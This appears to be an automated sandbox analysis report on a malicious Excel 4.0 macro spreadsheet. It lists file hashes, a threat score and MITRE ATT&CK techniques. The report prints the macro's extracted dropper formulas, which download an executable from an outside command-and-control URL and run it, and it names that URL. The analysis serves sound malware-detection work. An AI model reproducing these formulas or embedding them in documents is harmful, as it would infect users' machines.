Overview

overview

10

Static

static

10

9ef8631578...20.xls

windows7-x64

10

9ef8631578...20.xls

windows10-2004-x64

10

Resubmissions

22-12-2022 07:10

221222-hzmwnsea46 10

09-04-2020 15:40

200409-vmw4mgq77e 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    9ef8631578196747fe6198a97c0ceb20

  • Size

    72KB

  • Sample

    221222-hzmwnsea46

  • MD5

    9ef8631578196747fe6198a97c0ceb20

  • SHA1

    5eebe8e0a1c50e54391618b83a917e7f32b18bf8

  • SHA256

    5a21120c9bd779786888f9d4d2a138836e627f001dbacc80c2b035ff7d198715

  • SHA512

    04c7c0ecf6ad26546155218886188d5fc444c2067f9f28246094ad15fb5e4f1b0026fbc220ca18a2f34ba6f7629d371487b7dacfdbd6e4955fa64009e012a62f

  • SSDEEP

    1536:AT3k3hbdlylKsgqopeJBWhZFGkE+cL2NdAsZYsztEHhy4kot7Ty1YBu:Azk3hbdlylKsgqopeJBWhZFGkE+cL2Nr

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://fikima.com/axel.exe

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\LJDVSoL",0) =CALL("Kernel32","CreateDirectoryA","JCJ","C:\LJDVSoL\jolwzPk",0) =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://fikima.com/axel.exe","C:\LJDVSoL\jolwzPk\luFzdsM.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\LJDVSoL\jolwzPk\luFzdsM.exe",,0,0) =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://fikima.com/axel.exe

Targets

    • Target

      9ef8631578196747fe6198a97c0ceb20

    • Size

      72KB

    • MD5

      9ef8631578196747fe6198a97c0ceb20

    • SHA1

      5eebe8e0a1c50e54391618b83a917e7f32b18bf8

    • SHA256

      5a21120c9bd779786888f9d4d2a138836e627f001dbacc80c2b035ff7d198715

    • SHA512

      04c7c0ecf6ad26546155218886188d5fc444c2067f9f28246094ad15fb5e4f1b0026fbc220ca18a2f34ba6f7629d371487b7dacfdbd6e4955fa64009e012a62f

    • SSDEEP

      1536:AT3k3hbdlylKsgqopeJBWhZFGkE+cL2NdAsZYsztEHhy4kot7Ty1YBu:Azk3hbdlylKsgqopeJBWhZFGkE+cL2Nr

    Score
    10/10
    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks